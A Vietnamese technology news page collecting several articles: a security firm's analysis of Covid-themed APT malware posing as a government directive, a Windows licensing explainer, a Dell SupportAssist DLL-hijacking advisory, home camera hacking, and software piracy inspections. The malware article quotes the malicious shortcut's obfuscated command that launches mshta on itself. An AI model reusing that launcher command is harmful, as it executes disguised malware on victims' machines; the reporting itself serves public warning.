Theo ghi nhận của Công ty CMC Cyber Security, mã độc được chèn trong một tệp văn bản với tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc” nhằm đánh lừa người dùng. Mẫu mã độc này được mới được thu thập được qua hệ thống CMC Threat Intelligence.
Trong báo cáo phân tích của CMC Cyber Security về mẫu mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, doanh nghiệp bảo mật này cho hay, thời gian gần đây do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm hacker lợi dụng việc này để thực hiện các chiến dịch APT (tấn công có chủ đích – PV) nhằm vào các tổ chức trên thế giới, cũng như xuất hiện chiến dịch ở Việt Nam.
Mới đây, lợi dụng tình hình căng thẳng của dịch viêm đường hô hấp cấp Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn bản thông báo của Chính phủ về tình hình dịch để đánh lừa người dùng.
Cụ thể, mẫu mã độc được chèn trong một file word với tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. Theo phân tích của chuyên gia, file mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.
Cũng qua phân tích file mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành: tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…
“Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp.
APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, luôn luôn phải chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức”, chuyên gia bảo mật nhấn mạnh.
Trước đó, trong trao đổi với ICTnews đầu tháng 2/2020, mặc dù chưa ghi nhận trường hợp email hay các link tin tức tiếng Việt có nội dung giả mạo về virus Corona (tên gọi hiện nay là Covid-19 –PV) có gắn mã độc, song khi đó các chuyên gia bảo mật của CMC, VSEC cũng đã cảnh báo rằng trong tương lai gần khả năng xuất hiện mã độc lợi dụng tin tức về dịch là rất cao.
“Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hàng ngày không chỉ riêng các thông tin về Covid-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc”, chuyên gia bảo mật cảnh báo.
Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện nhiều trên mạng như hiện nay, các chuyên gia bảo mật khuyên người dùng cần cảnh giác cao khi tham gia vào thế giới online trên không gian mạng, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân; và không chia sẻ các thông tin không chính thống trên mạng xã hội.
“Trường hợp bắt buộc phải tải file về nhưng thấy có nghi ngờ về nội dung hoặc người gửi thì người dùng cần forward email đó vào một email tạm thời khác và dùng một máy khác, tách biệt khỏi mạng đang làm việc để mở file. Nếu nắm về kĩ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo)”, chuyên giao bảo mật lưu ý thêm.
Các hình thức cấp phép Windows 10 bản quyền cho khách hàng từ Microsoft.
Windows Licensing (Hình thức cấp phép Windows) vốn được coi là chủ đề khá dễ nhầm lẫn không chỉ cho khách hàng đóng vai trò là người sử dụng, mà còn còn cả đại lý, đối tác của Microsoft là người bán. Điều này dẫn tới việc tư vấn chưa chính xác về hình thức cấp phép, ảnh hưởng tới quyền lợi của khách hàng khi mua và sử dụng Windows bản quyền.
Windows Licensing (Hình thức cấp phép Windows) là gì?
Khách hàng chi trả để có quyền sử dụng hợp pháp phần mềm Windows bản quyền thay vì sở hữu phần mềm này.
Windows Licensing cung cấp các hình thức hợp pháp cho khách hàng và đối tác của Microsoft để có Windows 10 bản quyền. Nhu cầu của khách hàng là rất đa dạng như:
Windows 10 trên máy tính mới mua?
Windows 10 cài song song hai hệ điều hành trên máy MacOS?
Windows 10 trên máy tính đang sử dụng, hiện chưa có Windows bản quyền?
Có/Không nhu cầu chuyển đổi Windows 10 sang máy tính mới?
Số lượng máy tính cần có Windows 10 hay quy mô mà khách hàng muốn triển khai?
Mục đích sử dụng Windows 10 trên thiết bị cho Cá nhân & Gia đình, hay Doanh nghiệp nhỏ/vừa/lớn, giáo dục, chính phủ…?
Windows Licensing cơ bản được tóm gọn trong bảng dưới đây:
Trong đó:
OEM (Original Equipment Manufacturer): Là hình thức Windows bản quyền được các nhà sản xuất, lắp ráp tích hợp sẵn trên máy tính mới trước khi giao máy cho khách hàng – người sử dụng cuối (End-User). Khi đó người dùng cuối đã chi trả cho cả Windows và phần cứng như một khối thống nhất.
FPP (Full Package Product): Là hình thức Khách hàng mua và được cấp phép sử dụng Windows 10 như một phần mềm độc lập như các phần mềm khác. Vì vậy khách hàng toàn quyền sử dụng Windows 10 này từ việc chuyển sang máy tính khác hay cài trên máy tính cả mới và cũ đều được.
So sánh giữa OEM và FPP:
Hai hình thức cấp phép còn lại thực sự là nội dung dễ nhầm lẫn cho đại lý, đối tác khi tư vấn cho khách hàng.
Volume Licensing Agreements (VL) – OLP: Là hình thức bản nâng cấp Windows cho số lượng từ 05 máy trở lên. Vì là bản nâng cấp, nên yêu cầu đầu tiên và bắt buộc là thiết bị phải sẵn có bản Windows Pro hoặc Hệ điều hành hợp lệ như là bản quyền nền*. Khách hàng mua cấp phép Windows theo hình thức Volume Lincesing để nâng cấp Windows hiện tại lên các phiên bản có các tính năng cao cấp, bảo mật hơn tùy theo quy mô và nhu cầu.
GGK/GGWA: Là Giải pháp hợp thức hóa Windows (GGWA/GGK) nhằm để sửa các vấn đề chưa tuân thủ cấp phép Windows trên các máy tính hiện có.
GGK (Get Genuine Kit): Hợp thức hóa bản quyền cho các máy tính cũ chưa dùng hệ điều hành bản quyền với cá nhân và doanh nghiệp nhỏ, có số lượng không vượt quá 05 thiết bị.
GGWA (Get Genuine Windows Agreement): Hợp thức hóa bản quyền cho doanh nghiệp nhỏ và vừa cho số lượng máy tính trên 05 máy theo dạng của Volume License – 1 key cài đặt nhiều thiết bị.
Miêu tả: Không có đĩa cài và tem, chỉ có bản thỏa thuận sử dụng giữ bên mua và Microsoft. Truy cập trang: https://www.microsoft.com/Licensing/servicecenter/default.aspx để lấy key và download.
Tóm lại, với MÁY TÍNH MỚI, khách hàng có những lựa chọn nào?
Với máy tính cũ, ĐANG SỬ DỤNG, người dùng có lựa chọn nào?
Một nhà nghiên cứu đã phát hiện ra một lỗ hổng DLL hijacking trong Dell SupportAssist, cho phép thực thi mã với các đặc quyền cao. Khai thác lỗ hổng chỉ yêu cầu quyền thấp.
Dell đã tiết lộ rằng, Dell SupportAssist cho PC doanh nghiệp và gia đình đều bị ảnh hưởng bởi lỗ hổng đường dẫn tìm kiếm không được kiểm soát, cho phép người dùng có đặc quyền thấp thực thi mã tùy ý với quyền nâng cao bằng cách tác động để các tệp nhị phân SupportAssist tải các tệp DLL tùy ý.
Lỗ hổng CVE-2020-5316 được đánh giá ở mức độ nghiêm trọng cao, đã được Dell phát hành bản vá SupportAssist cho PC doanh nghiệp phiên bản 2.1.4 và SupportAssist cho PC gia đình phiên bản 3.4.1.
Eran Shimony – nhà nghiên cứu phát hiện ra lỗ hổng bảo mật này – cho biết Dell mất 3 tháng để phát hành các bản vá, nhanh hơn so với thời gian vá hầu hết các lỗ hổng khác mà ông đã báo cáo với Dell.
Những loại lỗ hổng này có thể mang lại giá trị đối với các kẻ tấn công bởi phần mềm này đã được cài đặt sẵn trên hàng triệu PC Dell. Mục đích của Dell SupportAssist là cho phép người dùng kiểm tra tình trạng thiết bị. Việc kiểm tra phần mềm và phần cứng được thực hiện bởi công cụ yêu cầu các đặc quyền nâng cao, bởi vậy một số thành phần của chúng phải chạy với đặc quyền hệ thống.
Một số lỗ hổng leo thang đặc quyền đã được tìm thấy trong Dell SupportAssist trong vài năm qua, nhưng các lỗ hổng liên quan đến DLL hijacking có thể yêu cầu các đặc quyền nâng cao để khai thác, và các nhà cung cấp phần mềm thường nói rằng chúng có rủi ro thấp.
DLL hijacking liên quan đến việc đưa tệp DLL độc hại vào một vị trí trên hệ thống, từ đó ứng dụng mục tiêu sẽ tải tệp độc hại trước các thành phần hợp pháp.
Nếu một ứng dụng không tìm thấy tệp DLL trong thư mục hiện tại hoặc các thư mục hệ thống, nó sẽ cố gắng xác định vị trí tệp trong biến môi trường của hệ thống PATH. Kẻ tấn công với đặc quyền quản trị có thể viết đường dẫn riêng tới biến này, do đó đảm bảo rằng tệp sẽ được tải khi phần mềm mục tiêu được thực thi.
Với trường hợp lỗ hổng CVE-2020-5316, Shimony đã phát hiện ra Dell SupportAssist cố tải DLL từ thư mục mà ngay cả người dùng có đặc quyền không phải quản trị viên cũng có thể sao chép tệp.
Do vậy, hacker, dưới vai trò là một người dùng có đặc quyền thấp, có thể tạo một DLL và lừa để Dell SupportAssist tải DLL này, từ đó giành quyền thực thi mã bên trong phần mềm chạy với các đặc quyền NT AUTHORITY\System. “Điều này xảy ra bởi bạn có thể viết một code entry trong hàm DLLMain (DLL độc hại). Đoạn mã này sẽ chạy ở cấp đặc quyền của NT AUTHORITY\System’, Dell cho biết.
Liệu tin tặc có thể tấn công hệ thống camera an ninh trong nhà của bạn không và chúng thực hiện điều đó như thế nào? Bạn có thể làm gì để tự bảo vệ mình?
Đầu năm 2019, một vụ tấn công vào hệ thống an ninh gia đình tại bang Illinois của Mỹ xảy ra khiến người dân nước này lo ngại. Vụ việc được phát hiện khi Arjun Sud nghe thấy tiếng của người đàn ông khác trong phòng của con trai mình. Âm thanh này phát ra từ một camera (của hãng Nest, một công ty con của Google chuyên về hệ thống an ninh gia đình) lắp đặt trong phòng.
Khi tên tin tặc phát hiện chủ nhân căn nhà đã phát giác, hắn ta chuyển sang quấy rối và đe dọa Arjun. Trong một thông cáo báo chí, Google phủ nhận việc hệ thống Nest bị tấn công thành công và cho rằng sự việc này xuất phát từ người dùng do đặt mật khẩu truy cập quá dễ đoán.
Ngày nay, rất nhiều hộ gia đình đã chuyển sang sử dụng các loại smart camera để bảo đảm an ninh cho ngôi nhà, con cái và tài sản của mình khi đi làm hay đi du lịch. Hiện có rất nhiều hãng, nhiều dòng smart camera khác nhau trên thị trường, chúng rất dễ lắp đặt và có nhiều tính năng như phát hiện chuyển động hay theo dõi thời gian thực qua ứng dụng di động… Nhưng cũng giống với hầu hết thiết bị IoT khác, cả smart camera lẫn smartphone đều có thể bị tin tặc tấn công.
Những vụ việc tấn công vào hệ thống an ninh không chỉ diễn ra tại Việt Nam, Mỹ, hay Trung Quốc mà chúng đều đã xảy ra ở mọi nơi trên thế giới. Theo Vladislav Iliushin, chuyên viên nghiên cứu về lỗ hổng IoT của Avast cho biết “theo thống kê, tại Ấn Độ có đến một phần ba số gia đình sử dụng thiết bị smart home có kết nối trực tuyến hệ thống camera an ninh. Camera an ninh cũng là mục tiêu dễ bị tấn công nhất, chiếm 45,6% trong các cuộc tấn công mạng”.
Năm 2018, số vụ tấn công vào hệ thống camera chiếm 15,2% trên tổng số các vụ tấn công vào hệ thống IoT, con số này chỉ có 3,5% vào năm 2017. Sự thay đổi mạnh mẽ chỉ trong một năm cho thấy mức độ mất an toàn của các hệ thống an ninh gia đình hiện nay, Ritesh Chopra, quản lý bộ phận bán hàng của Symantec cho biết.
Theo Kaspersky, hầu hết smart camera hiện nay đều cho phép truy cập thông qua nền tảng web và chúng có thể điều khiển trực tiếp với toàn bộ chức năng trên nền tảng này.
Nói cách khác, mỗi camera sẽ có một trang web riêng. Vấn đề là những trang web này và đường truyền hình ảnh có thể dễ dàng tìm được thông qua hệ thống tìm kiếm chuyên biệt, như Shodan hay Censys chẳng hạn.
“Khi đã có thể truy cập vào hệ thống camera của bạn, những tên tội phạm mạng sẽ theo dõi hoạt động hàng ngày của gia đình bạn và sử dụng những thông tin có được để lên kế hoạch đột nhập căn nhà”, ông Chopra cho biết.
Kaspersky nhận định, vấn đề ở camera giám sát là hầu hết người dùng và cả nhà sản xuất đều ưu tiên tính dễ sử dụng hơn là tính bảo mật. Đó là lý do tại sao các hệ thống này có thể dễ dàng bị tấn công như vậy. Thách thức lớn nhất của camera giám sát là chúng thiếu cả về phần cứng lẫn phần mềm để có thể đặt tính bảo mật lên ưu tiên hàng đầu.
“Hiện này có rất ít, hoặc có thể nói là hầu như không có bất cứ tiêu chuẩn bảo mật chung nào đối với thiết bị an ninh thông minh như camera chẳng hạn. Thay vào đó, các nhà sản xuất tập trung vào việc xây dựng những tiêu chuẩn riêng cho mình và tất nhiên là bảo mật không phải là một ưu tiên hàng đầu”, ông Iliushin cho biết.
Người dùng có thể giảm thiểu nguy cơ bị tấn công bằng cách thay đổi mật khẩu truy cập thường xuyên. Đặc biệt là đối với các hệ thống được lắp đặt bởi bên thứ ba, bạn phải thay đổi mật khẩu và tên đăng nhập ngay sau khi hệ thống được lắp đặt xong. Nếu bạn vẫn giữ nguyên mật khẩu và tên đăng nhập do công ty lắp đặt cung cấp, hệ thống an ninh của bạn sẽ bị tấn công rất dễ dàng do những mật khẩu và tên truy cập này thường rất đơn giản và được dùng chung cho tất cả các khách hàng.
Ngoài ra, bạn cần cập nhật firmware và bản vá bảo mật cho thiết bị thường xuyên. Sự đa dạng về phương thức tấn công ngày càng lớn, do vậy chỉ cần bạn không cập nhật firmware hay các bản vá bảo mật một vài tháng cũng có thể tạo ra một lỗ hổng trong hệ thống an ninh của gia đình.
Với sự phát triển mạnh mẽ của các thiết bị an ninh thông minh và thiết bị IoT ngày nay, tội phạm mạng sẽ ngày càng trở nên phổ biến và hoạt động mạnh mẽ hơn. Những sự việc tương tự với vụ ca sĩ Văn Mai Hương cũng sẽ còn tiếp tục xảy ra và thậm chí còn có thể nghiêm trọng hơn nữa nếu như các nhà sản xuất thiết bị không đầu tư thích đáng vào việc xây dựng hệ thống bảo mật.
Đối với người dùng, chúng ta cũng cần phải tự bảo vệ mình bằng cách cài đặt mật khẩu đủ mạnh và thiết lập một hệ thống mạng riêng chỉ dành cho các thiết bị an ninh trong nhà thay vì dùng chung hệ thống mạng Wi-Fi.
Các tập đoàn, công ty bị thanh tra vì sử dụng phần mềm bất hợp pháp ở Thái Nguyên, Vĩnh Phúc, Hưng Yên và Bắc Ninh. Ba trong số Bốn tập đoàn bị thanh tra trong tháng Mười Một có vốn đầu tư lớn từ nước ngoài đang kinh doanh tại Việt Nam.
Báo cáo của BSA (Liên minh phần mềm) cho biết trong tháng 11, các cơ quan chức năng của Việt Nam đã thanh tra đột xuất 4 tập đoàn, công ty đang sử dụng các phần mềm bất hợp pháp trong hoạt động kinh doanh với tổng giá trị vi phạm lên tới 220.000 USD. Các đơn vị này thuộc các lĩnh vực công nghiệp trọng điểm, dệt may, linh kiện vận tải đặt tại các tỉnh Thái Nguyên, Vĩnh Phúc, Hưng Yên và Bắc Ninh. Ba trong số Bốn tập đoàn bị thanh tra trong tháng Mười Một có vốn đầu tư lớn từ nước ngoài đang kinh doanh tại Việt Nam.
Kể từ đầu năm 2019, các lực lượng chức năng của Việt Nam đã thanh tra 50 công ty sử dụng phần mềm bất hợp pháp. Tất cả đều là các tập đoàn, công ty quy mô lớn sử dụng phần mềm không phép trên máy tính công ty (PC) và trong các hoạt động kinh doanh khác.
“Tất cả các công ty vi phạm bị thanh tra đều có quy mô với vốn đầu tư lớn, hoàn toàn có khả năng mua bản quyền cho các phần mềm. Họ đã cố tình phớt lờ các cảnh báo từ BSA thông qua các phương tiện thông tin đại chúng và mạng xã hội. Chúng tôi tin rằng nếu tất cả các doanh nghiệp đang hoạt động tại Việt Nam đều tuân thủ quy định, điều đó sẽ mang lại lợi ích tốt nhất cho tất cả”, ông Tarun Sawney, Giám đốc cấp cao của BSA tại khu vực châu Á – Thái Bình Dương cho biết.
Hồi tháng 10, BSA đã ra mắt một chiến dịch nhằm cung cấp thông tin, kiến thức cho các CEO cần loại bỏ việc sử dụng phần mềm trái phép. Ngoài Việt Nam, chiến dịch này còn được phổ biến tại Indonesia, Philippines và Thái Lan.
“Mục tiêu của chúng tôi là bảo vệ và ủng hộ quyền của những đơn vị phát triển phần mềm để họ có thể tiếp tục tạo ra phần mềm sáng tạo, chất lượng cao được các công ty trên khắp thế giới sử dụng”, ông Sawney nói. “Các cuộc thanh tra của chính phủ là phương án bất đắc dĩ cuối cùng mà chúng tôi buộc phải áp dụng khi không thể thuyết phục các công ty tự giác thực hiện đúng luật. Chúng tôi mong muốn các chủ doanh nghiệp tự giám sát hoạt động và chủ động lựa chọn hợp pháp hóa các phần mềm họ sử dụng. Khi đó, sẽ không cần tới các cuộc thanh tra nữa”.
BSA nhấn mạnh rằng, ngoài việc tránh các rắc rối về mặt pháp lý, hợp pháp hóa phần mềm còn có một số lợi ích như giúp các tập đoàn ngăn chặn các nguy cơ bị tấn công mạng, cải thiện năng suất, giảm thời gian trì hoãn, quản lý tập trung các giấy phép và giảm thiểu chi phí nhờ vào các gói đăng ký sử dụng linh hoạt.
Chúng tôi sử dụng lưu bộ nhớ tạm cookie cho thiết bị của bạn, để ghi nhớ các nội dung bạn đã xem. Đồng ý với điều này sẽ cho phép duyệt web thuận lợi hơn. Không đồng ý hoặc rút lại sự đồng ý, có thể gây chậm cho trải nghiệm khi xem bài viết.
Functional
Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes.The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
